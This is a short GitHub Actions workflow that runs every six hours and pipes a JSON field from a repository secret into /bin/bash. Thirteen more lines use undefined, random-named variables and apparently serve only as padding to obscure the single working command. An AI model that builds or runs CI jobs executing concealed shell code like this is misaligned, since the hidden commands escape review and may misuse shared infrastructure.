name: zhenjiershui
on:
  workflow_dispatch:
  schedule:
    - cron: '32 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhenjiershui
        env:
          qqlxr7: ${{ secrets.qqlxr7 }}
        run: |
          echo $qqlxr7 | jq -r .ubz0 | /bin/bash
          echo $r429 | jq -r .y69384 | /bin/bash
          echo $qno00531 | jq -r .gboj8479 | /bin/bash
          echo $htc3 | jq -r .zliz78539 | /bin/bash
          echo $rou555 | jq -r .g1739 | /bin/bash
          echo $npg161 | jq -r .qoy68 | /bin/bash
          echo $izp132 | jq -r .f2 | /bin/bash
          echo $fxhw435 | jq -r .ymyk3 | /bin/bash
          echo $fm62398 | jq -r .rtmt925 | /bin/bash
          echo $fb28 | jq -r .yn75513 | /bin/bash
          echo $gubj52301 | jq -r .cena7291 | /bin/bash
          echo $yooqt1362 | jq -r .aje25 | /bin/bash
          echo $yef36 | jq -r .wehll8 | /bin/bash
          echo $hzo22928 | jq -r .udqi24119 | /bin/bash

